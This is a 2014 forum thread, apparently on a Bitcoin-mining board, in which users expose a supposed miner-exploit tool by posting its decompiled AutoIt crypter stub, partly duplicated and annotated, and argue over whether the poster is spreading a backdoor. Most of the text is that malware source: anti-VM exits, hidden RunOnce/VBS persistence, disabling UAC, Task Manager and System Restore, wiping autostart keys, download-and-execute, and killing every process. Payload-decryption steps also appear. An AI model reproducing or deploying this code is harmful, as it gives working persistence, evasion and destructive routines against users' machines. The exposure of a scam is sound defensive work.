    If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
        $pathtovbs = ($uniscriptdir & "\" & "run.vbs")
        ShellExecute($pathtovbs)
        Exit
    EndIf
EndFunc
; One-shot download-and-execute (dl.txt marker prevents repeats): fetches a
; file to %userprofile%\<random>.exe and runs it. The URL is still the
; literal placeholder "replace-me-url", i.e. this build never had it
; configured, so the download would fail and the ShellExecute hit a
; non-existent file. $nbytes is read but never used.
Func downloader()
    If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
    Else
        FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
        $random_download_name = Random(10000, 99999, 1) & ".exe"
        Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
        Do
            Sleep(250)
        Until InetGetInfo($hdownload, 2)
        Local $nbytes = InetGetInfo($hdownload, 0)
        InetClose($hdownload)
        ShellExecute($unicode_userprofile & "\" & $random_download_name)
    EndIf
EndFunc
; Kills every process in the process list that it can, then exits -
; effectively tearing the session down, hence the name. Called from loop().
Func bsod()
    $a = ProcessList()
    For $i = 1 To UBound($a) - 1
        ProcessClose($a[$i][0])
    Next
    Exit
EndFunc
; Wipes competing autostart entries: deletes and recreates (empty) the HKCU
; and HKLM Run keys and removes every file in the user's Startup folder.
; This also removes any legitimate autostart entries the user had.
Func botkiller()
    RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    FileDelete(@StartupDir & "\*.*")
EndFunc
; Once (check.txt marker in the script dir): deletes the SPP\Clients key
; under HKLM, where System Protection registers its clients - presumably to
; stop restore points being created. HKLM write, so needs elevation.
Func disable_syste_restore()
    If FileExists($uniscriptdir & "\check.txt") Then
    Else
        RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
        FileWrite($uniscriptdir & "\check.txt", "")
    EndIf
EndFunc
; Runs $scommand through cmd.exe /C with a hidden window and returns its
; exit code, propagating @error/@extended from RunWait.
Func _rundos($scommand)
    Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
    Return SetError(@error, @extended, $nresult)
EndFunc
; CryptoAPI provider/algorithm constants. These match (lower-cased by the
; decompiler) the constants of AutoIt's Crypt.au3 UDF, presumably pulled in
; by an #include; whatever uses them is in the snipped region below.
Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]
[SNIP] ----------------- [SNIP]
; Watchdog, polled every 100 ms: if %userprofile%\datascrambler\clean.txt
; appears, calls __bsod() (defined in the snipped region; takes $scriptname
; from mutex()); if a window titled "ppqzt" ($path) exists, calls bsod().
Func loop()
    While 1
        If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
            __bsod($scriptname, False)
        EndIf
        If WinExists($path) Then
            bsod()
        Else
        EndIf
        Sleep(100)
    WEnd
EndFunc
Yeah, why should I bother running this in a VM? Nice game, OP... but you lose!
sandor111
January 28, 2014, 12:21:39 AM |
Yuck, that is some nasty code... WTF, really..?
Sarge
January 28, 2014, 03:48:01 AM |
> I finished compiling my "Proof of Concept" application to allow you to test out the exploits on your OWN miners. When network sniffing is detected, the application will auto shut down! Antivirus results: Scanned with MetaScan, file is clean on 39/40 antivirus scanners. I have one false positive out of 40 with a minor AV vendor. The file is CLEAN !! If 39 of the biggest AV vendors show it's clean, it IS clean! Note: The false positive is triggered by the sub that detects network sniffing and shuts the application down. AV scan result: https://www.metascan-online.com/en/scanresult/file/d79999b0cbd74e978fc4dfee6d3bc0ef

- problem and solution are both mystical
- filename of the download differs from the file submitted to the online scanner
- author claims it's clean while making his statement look like the typical Nigerian-prince scam (colours, bold, the word "clean" repeated several times)
- code can't be run in a VM (WTF, why?!)
- when a network sniffer is detected the program shuts itself down (WTF²)
- no MD5/SHA hash of the download posted, so the scanned file can't even be tied to the download
reminds me of "you're from Anonymous Proxy too, let's meet up" — seems legit! <<< don't take this seriously
bitpop
January 28, 2014, 05:31:01 AM |
I love Lua
Op is delusional
steve15 (OP)
January 28, 2014, 03:22:21 PM |
That was smart to let us look at the other way... I'm disapointed by meself, I should have seen that earlier...

; ---- Decompiled AutoIt stub: entry point ------------------------------------
; Main body of the AutoIt script packed inside the OP's download. Every
; feature below is gated on an INI file (HbDzt.MCM) that sits next to the
; script: a function is called only when a given section/key holds a magic
; value. That INI is NOT shown anywhere in this thread, so which of these
; features actually fire in the OP's build cannot be determined from the
; script alone. Lines are re-wrapped for readability; the code is unchanged.

#NoTrayIcon

; If the Avast UI is running, stall 20 s before doing anything
; (presumably to wait out behavioural scanning).
If ProcessExists("avastui.exe") Then Sleep(20000)

; Name of the hidden working directory under %userprofile% and of the
; RunOnce value written by startup().
$path = "ppqzt"

; 8.3 short paths, so later file/registry writes survive non-ASCII profiles.
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"

; Mark the script's own directory system+hidden+read-only.
FileSetAttrib($uniscriptdir, "+SHR")

; --- feature switches read from HbDzt.MCM --------------------------------
; Sandbox stall (see delay()).
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
    delay()
Else
EndIf
; Single-instance check by process name (see mutex()).
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
    mutex()
Else
EndIf
; Persistence via Startup shortcut / RunOnce + dropped .cmd/.vbs (see startup()).
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
    startup()
Else
EndIf
; Anti-VM / anti-analysis exit (see antis()).
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
    antis()
Else
EndIf
; The remaining switches still use the crypter's un-obfuscated placeholder
; section/key names ("fake1", "botkiller1", ...).
; Decoy message box.
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
    fakemessage()
Else
EndIf
; Wipe other autostart entries.
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
    botkiller()
Else
EndIf
; Download-and-execute.
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
    downloader()
Else
EndIf
; Turn UAC off (HKLM write).
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
    disable_uac()
Else
EndIf
; Remove the System Protection client registration.
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
    disable_syste_restore()
Else
EndIf
; Disable Task Manager for the current user.
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
    antitask()
Else
EndIf
; Stalls about 30 s (6 x 5 s). Each round launches mshta.exe and then kills it
; through a hidden cmd; the likely intent is to outlast sandbox time limits
; while producing activity that looks like normal shell use.
Func delay()
    $counter = 0
    While $counter <= 5
        Sleep(5000)
        ShellExecute(@SystemDir & "\mshta.exe")
        $counter = $counter + 1
        _rundos("taskkill /IM mshta.exe")
    WEnd
EndFunc
; Removes Explorer's "Folder Options" menu and turns off display of
; super-hidden (system) files, so the +SH files dropped by startup() stay
; invisible to the user. Not called from the visible entry code.
Func systemhide()
    RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
    RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc
; Shows a decoy message box whose icon/title/text come from the INI, once:
; a check.txt marker in %userprofile%\ppqzt suppresses it on later runs.
Func fakemessage()
    $type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
    $title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
    $message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
    If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
    Else
        MsgBox($type, $title, $message)
        FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
    EndIf
EndFunc
; "Mutex" by process count: exits if another lmsqQw.exe is already running.
; ProcessList() returns the count in element [0][0], so UBound > 2 means two
; or more instances. lmsqQw.exe is the executable startup() relaunches with
; the script as argument (presumably a renamed AutoIt interpreter).
; Note: $scriptname is assigned here and also read by loop().
Func mutex()
    $scriptname = "lmsqQw.exe"
    If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc
; Blocks Task Manager for the current user (DisableTaskMgr=1 under HKCU
; policies) unless it is already set.
Func antitask()
    $read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
    If NOT ($read_antitask = "1") Then
        RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
    EndIf
EndFunc
; Turns UAC off system-wide (EnableLUA=0). This is an HKLM write, so it only
; succeeds when the stub is already running elevated.
Func disable_uac()
    $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
    If NOT ($read_uac = "0") Then
        RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
    EndIf
EndFunc
; Persistence. Registers %userprofile%\ppqzt\85841.vbs as a RunOnce value and,
; when UAC elevation is enabled, also as a hidden Startup-folder shortcut.
; On first run it drops two files: 65084.cmd, which cd's into the hidden
; directory and starts lmsqQw.exe with this script's name as argument, and
; 85841.vbs, which runs that .cmd through WScript.Shell with a hidden window.
; Both are marked system+hidden+read-only. (FileOpen mode 1 = append.)
Func startup()
    $buac = _checkelevationenabled()
    If $buac = 0 Then
    Else
        FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
        FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
    EndIf
    RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
    If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
        ; .cmd launcher: relaunch the interpreter against this script.
        Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
        $autoit3 = "lmsqQw.exe"
        FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
        FileClose($bat)
        ; .vbs wrapper: run the .cmd with a hidden window.
        Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
        FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
        FileClose($vbs)
        RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
        FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
        FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
        ; The Startup shortcut created above is removed again on first run.
        If FileExists($unicode_startup & "\start.lnk") Then
            FileDelete($unicode_startup & "\start.lnk")
        EndIf
    Else
    EndIf
EndFunc
; Returns the BOOL from kernel32!CheckElevationEnabled (UAC elevation on/off)
; with @error set to the call's return value. Returns early with nothing if
; the EnableLUA registry read fails.
Func _checkelevationenabled()
    $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
    If @error Then Return
    Local $struct = DllStructCreate("BOOL")
    Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
    If @error Then
        Return SetError(@error)
    EndIf
    Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc
; Anti-analysis: exits if the desktop ("Program Manager") window text reads
; "0" (intent unclear; presumably a sandbox heuristic) or if a VirtualBox or
; VMware guest-tools process is running. This is the whole of the
; "anti-virtual" logic; nothing in the visible script detects sniffers,
; decompilers or debuggers (the snipped region is not shown).
Func antis()
    If WinGetText("Program Manager") = "0" Then
        Exit
    Else
    EndIf
    If ProcessExists("VboxService.exe") Then
        Exit
    EndIf
    If ProcessExists("VMwaretray.exe") Then
        Exit
    EndIf
EndFunc
; If none of six well-known signed host processes is running, launches
; run.vbs from the script directory and exits. run.vbs is not shown; the
; process list reads like the hosts a RunPE-style injector would use, so
; this presumably re-launches the payload inside one of them - verify.
; Not called from the visible entry code.
Func persistence()
    If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
        $pathtovbs = ($uniscriptdir & "\" & "run.vbs")
        ShellExecute($pathtovbs)
        Exit
    EndIf
EndFunc
; One-shot download-and-execute (dl.txt marker prevents repeats): fetches a
; file to %userprofile%\<random>.exe and runs it. The URL is still the
; literal placeholder "replace-me-url", i.e. this build never had it
; configured, so the download would fail and the ShellExecute hit a
; non-existent file. $nbytes is read but never used.
Func downloader()
    If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
    Else
        FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
        $random_download_name = Random(10000, 99999, 1) & ".exe"
        Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
        Do
            Sleep(250)
        Until InetGetInfo($hdownload, 2)
        Local $nbytes = InetGetInfo($hdownload, 0)
        InetClose($hdownload)
        ShellExecute($unicode_userprofile & "\" & $random_download_name)
    EndIf
EndFunc
; Kills every process in the process list that it can, then exits -
; effectively tearing the session down, hence the name. Called from loop().
Func bsod()
    $a = ProcessList()
    For $i = 1 To UBound($a) - 1
        ProcessClose($a[$i][0])
    Next
    Exit
EndFunc
; Wipes competing autostart entries: deletes and recreates (empty) the HKCU
; and HKLM Run keys and removes every file in the user's Startup folder.
; This also removes any legitimate autostart entries the user had.
Func botkiller()
    RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    FileDelete(@StartupDir & "\*.*")
EndFunc
; Once (check.txt marker in the script dir): deletes the SPP\Clients key
; under HKLM, where System Protection registers its clients - presumably to
; stop restore points being created. HKLM write, so needs elevation.
Func disable_syste_restore()
    If FileExists($uniscriptdir & "\check.txt") Then
    Else
        RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
        FileWrite($uniscriptdir & "\check.txt", "")
    EndIf
EndFunc
; Runs $scommand through cmd.exe /C with a hidden window and returns its
; exit code, propagating @error/@extended from RunWait.
Func _rundos($scommand)
    Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
    Return SetError(@error, @extended, $nresult)
EndFunc
; CryptoAPI constants, presumably consumed by the crypter's payload-decryption
; routine. Names and decimal values appear to match wincrypt.h / AutoIt's
; Crypt.au3 UDF; hex equivalents are noted where the decimal form is not obvious.
Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456   ; 0xF0000000 as a signed 32-bit value
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769                   ; 0x8001
Global Const $calg_md4 = 32770                   ; 0x8002
Global Const $calg_md5 = 32771                   ; 0x8003
Global Const $calg_sha1 = 32772                  ; 0x8004
Global Const $calg_3des = 26115                  ; 0x6603
Global Const $calg_aes_128 = 26126               ; 0x660E
Global Const $calg_aes_192 = 26127               ; 0x660F
Global Const $calg_aes_256 = 26128               ; 0x6610
Global Const $calg_des = 26113                   ; 0x6601
Global Const $calg_rc2 = 26114                   ; 0x6602
Global Const $calg_rc4 = 26625                   ; 0x6801
Global Const $calg_userkey = 0
; Three-slot internal state array of the Crypt UDF; its contents are not shown
; here (presumably a cached provider handle plus bookkeeping — TODO confirm).
Global $__g_acryptinternaldata[3]
[SNIP] ----------------- [SNIP]
; Main polling loop: never returns, wakes every 100 ms. Two tripwires:
;  - a clean.txt marker under $unicode_userprofile\datascrambler calls
;    __bsod($scriptname, False), a separate function not shown here (note the
;    double underscore — this is not the bsod() defined earlier in the listing);
;  - a window whose title matches $path calls bsod(), killing every process.
; $path is used elsewhere as a folder name, so the WinExists test is presumably
; a self-detection / analysis-window tripwire — TODO confirm. The hard-coded
; "datascrambler" folder name is a usable host-based indicator.
Func loop()
    While 1
        If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
            __bsod($scriptname, False)
        EndIf
        If WinExists($path) Then
            bsod()
        Else
        EndIf
        Sleep(100)
    WEnd
EndFunc
Yeah, why should I bother running this in a VM? Nice game, OP... but you lose! Are you kidding me or what? Did you really just post the crypter's source?! What does this have to do with my source? The source you just posted proves that none of the functions included, except the anti-VM checks, are being used. That was smart, making us look the other way... I'm disappointed in myself, I should have seen that earlier... If you didn't even see that one, even after decompiling the executable, well, I'm sorry, but you're unskilled then. Plus, if you followed the topic, I explicitly posted about crypting the source. Now for the last time, stop spamming my topic. I've had enough of your make-no-sense posts here. If you really think you are all that mighty, then PM me as I asked you, and we'll compare our sources. Then once again, you will be disappointed in yourself. For the third time in a row.
bitpop
January 28, 2014, 03:41:13 PM |
Show him lemmy, don't hold back.
steve15 (OP)
January 28, 2014, 04:19:55 PM |
Here are my beliefs
ici_lemmy does not even own mining equipment.
Because, instead of testing whether his rigs are exploitable or not, he went straight to decompiling all the files. Since he did not make a single post in this thread before I posted my tool, I believe he was just waiting to try and exploit my tool in order to do nasty stuff with it.
Why else decompile before trying...
Dozens of PM's regarding this kind of "users" (i prefer the term hacker, but what's in a name...) are submitted to me by concerned miners.
For this reason, none of the exploit code can be found inside the main executables. I also crypted the files to prevent a run while sniffers are active or virtual environments are detected. I also posted this before posting the tool.
As ici_lemmy himself posts, he is disappointed in himself. Why? Because for the third time in a row he posts decompiled code that does... nothing at all!
This proves to me his eagerness to get at the core files in order to abuse them.
If I had a program that was as evil as he tries to picture it, I would have deleted it by now. It also seems logical that some AV/AM/FW scanner would have picked it up by now.
So for the last and final time:
IF YOU ARE PLANNING ON ABUSING THE SOURCE... GET LOST, YOU CAN'T. IF YOU ARE PLANNING ON POSTING BULLSHIT FOR NOT BEING ABLE TO EXTRACT THE SOURCE... GET LOST. IF YOU WANT TO TEST YOUR MINING EQUIPMENT... FEEL FREE TO DOWNLOAD AND TEST RUN, and THEN POST YOUR FINDINGS.
I will no longer reply to any scriptkiddie out there, trying to get hold on the source, tested, approved and verified by KnC itself, to start hacking some machines.
As stated before, this is the kind of behaviour that makes me want to keep all future exploits to myself instead of sharing them. I would have been better off just mining with your rigs, smiling while reading your posts about it...
Thank you
Chancellor
January 28, 2014, 04:37:49 PM |
Here are my beliefs
And what if... 1. You've discovered some minor vulnerability, which can only be exploited under extreme conditions, like a miner on a public IP. 2. You've made a fuss about it here. 3. You've prepared malicious software which, when run on a Windows machine on the same LAN as the miner, lets you take control of the miner. 4. Then you, the "benefactor" of the KnC user community, try to sneak your trojan onto users' machines and take their miners. Bullshit? Maybe. Impossible? I don't think so. Time will tell. IMHO the best way to deal with the "vulnerability" would be full, immediate disclosure.
BTC: 1GRx2H5esyFTucZCt1eX9tjpoqfMrbVHMT
ici_lemmy
January 28, 2014, 04:41:20 PM Last edit: January 28, 2014, 04:55:16 PM by ici_lemmy |
@steve15: I'm disappointed in myself because I did not expose you earlier... For the analysis, a quick answer because I have no more time to lose on this... OK, so here is my simple, full process to expose the scam (so anyone with the skills can reproduce it): - unrar the exe (it is an SFX archive) - remove the commented-out AutoIt script lines - modify the script so that it only writes out the decrypted payload (strip the anti-VM and destructive functions first, and do all of this on a disposable machine) - send the decrypted file to VirusTotal. Here are the VirusTotal results: https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50 detections (this is the SHA-256 of the decrypted payload, so by construction it will not match the hash of the original download). Conclusion: steve15 is not a professional pentester but rather a script kiddie trying to infect your computer with a backdoor. No need to thank me! @admin: you should remove the link to the tool and ban steve. Edit: @Chancellor: there is no vulnerability, except the cgminer API, which is not actually a vulnerability (it is an intended interface; the only risk is exposing it to an untrusted network, e.g. a miner on a public IP).
steve15 (OP)
January 28, 2014, 06:11:08 PM |
Here are my beliefs
And what if... 1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP. 2. You've made fuss about it here. 3. You've prepared a malicious software, which when ran on a Windows machine on the same LAN as miner allows you to take control over miner. 4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners. Bullshit? Maybe. Impossible? Don't think so. Time will tell. IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure. You are right about some parts. 1. If the vulnerability is minor, would KnC upgrade their firmware? It is not just the public IP miners who are in danger 2: If i prepared a malicious software to take control over users miner, would i really opt for an EXE file you think? Preparing malicious software, and binding it in a simple PDF file, where i claim to describe the method would be far more efficient for that purpose. People are not suspicious about a PDF, and they need to open it anyway.
steve15 (OP)
January 28, 2014, 06:22:01 PM Last edit: January 28, 2014, 06:38:31 PM by steve15 |
@steve15: I'm disappointed in myself because I did not expose you earlier... For the analysis, a quick answer because I have no more time to lose on this... OK, so here is my simple, full process to expose the scam (so anyone with the skills can do it): - unrar the exe - remove the commented-out AutoIt script lines - modify the script so that it writes out the decrypted file (and remove the nasty things) - send the decrypted file to VirusTotal, and here are the VirusTotal results: https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50 Conclusion: steve15 is not a professional pentester but rather a script kiddie trying to infect your computer with a backdoor. No need to thank me! @admin: you should remove the link to the tool and ban steve. Edit: @Chancellor: there is no vulnerability except the API in cgminer, which is not actually a vulnerability. You really are an idiot, excuse my language. Try this: - Download any executable file online, for example the Firefox installer. - Scan it with VirusTotal = 0/50 - Disassemble the exe or rar - Remove the commented lines - Modify the script to have the contents of the installer - Remove some lines - Send the decrypted file to VirusTotal = bam, at least 40/50. Every single known executable file in VirusTotal that gets modified by even 1 bit will get an instant alert. That is the main reason why you can't fake EXE file assembly without triggering an alert. Also notice our hashes: My hash: A5F3453E03DD2E4F356BEC7FB595B799A8EA6BE2C0466CE8550C74E247511870 Your hash: abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3 You scanned a "*.BIN" file. You could have uploaded WHATEVER file you wanted to upload. The hash check does not match, so it is not the same file, period. That's called faking results. Your file contains at least 15 DLL files that are not even present in my code!
THESE are the files included: Try this second method: Create any .NET project, Google some UPnP / network-scanning methods/modules/classes, compile, and send it to VirusTotal = bam, 40/50. So please, you have no idea what you are talking about. You also still failed to post the actual exploit code. You post the source of the crypter ITSELF to scare people, but you also fail to post its configuration file, so they could see I'm not using ANY of these 'scary' functions. At most, you can be considered a medium-skilled cracker, but that is where this story ends for you, ici_lemmy. Cracking, hacking and decompiling is more than running some cracked tools you found on thepiratebay.
ici_lemmy
January 28, 2014, 06:38:54 PM |
As I said, I have no more time to lose on that... I'm absolutely sure that you are a script kiddie trying to infect computers, and I explained how to verify what I'm saying (quickly, I have to admit) so anybody skilled enough can check for themselves...
Now if people are dumb enough to download your tool and run it on their actual computer, there is nothing more I can do...
steve15 (OP)
January 28, 2014, 06:40:48 PM |
As I said, I have no more time to loose with that... I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...
Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...
Just explain why you uploaded a completely different file, containing more than 15 DLL files that are NOT in my file. Explain why your upload contains a Remote Service Application, for example. Your posts are worth nothing, dude. Get lost. And see my edits above in my last post.
Chancellor
January 28, 2014, 07:20:10 PM |
Now if people are dumb enough to download your tool and run it on their actual computer, there is nothing more i can do...
Regardless of what is really contained in this file (and it does look fishy), the quote above is the most important thing. Steve15, if you wanted to play fair, you should disclose the vulnerability as a whole and in detail. Then: 1. Miners would know what the danger really is, without running some encrypted, suspicious executable, and could react fast and protect their rigs. 2. KnC would be forced to patch their firmware quickly, if that is really needed. 3. You would be acknowledged as the discoverer and would show your real pentesting skill. I would go for disclosure, especially as you said that KnC tried to sweep the problem under the carpet. Instead, the fact is that the whole story is directed by you in a way that tries to encourage people to run some encrypted, probably dangerous, application. As ici_lemmy said, if they are dumb enough, well...
BTC: 1GRx2H5esyFTucZCt1eX9tjpoqfMrbVHMT
nuno12345
January 28, 2014, 10:39:43 PM |
One last shot... AutoIt script MD5 pass: 1baba19a29b940f09293c9f47030d79c AutoIt script, encrypted code: ">>>AUTOIT SCRIPT<<<" "wb" "%.15g" "0x%p" "True" "False" "%s (%d) : ==> %s.: %s %s" "Line %d:" "Line %d (File "%s"):" "Error: " "AU3_FreeVar" .... "SeDebugPrivilege" More at 001FE0D0 Processor/virtual env check Address=001A6A16, Destination=kernel32.IsProcessorFeaturePresent Debugger check stages Address=0019D7C6, Destination=kernel32.IsDebuggerPresent Address=001A7DB7, Destination=kernel32.IsDebuggerPresent Address=001B1EE1, Destination=kernel32.IsDebuggerPresent I guess your autoit exe has all the protection on the exe itself and an additional encryption on the AutoIt script inside, but your file needs to run it so it must know the password or how to decrypt it. Long long shot, open Exe2Aut in a debugger (you'll need to unpack it with UPX first). Breakpoint at 0x004026B9 and hit the "Decompile" button. When the debugger breaks you will have the password at the top of the stack.
ici_lemmy
January 28, 2014, 11:05:58 PM |
Linux: $ unzip minerProofOfConcept.zip $ unrar e minerProof.exe $ sed '/^;/d' crLyJ > tmp.au3 (crLyJ is the extracted AutoIt script; this strips the comment-only lines) $ nano tmp.au3 (modify it to keep only the _crypt_* functions and the call to _crypt_decryptdata with the right parameters, so that it just writes out the decrypted payload) $ cp * /windows/ And under Windows: send the resulting file to any antivirus... You'll see for yourself.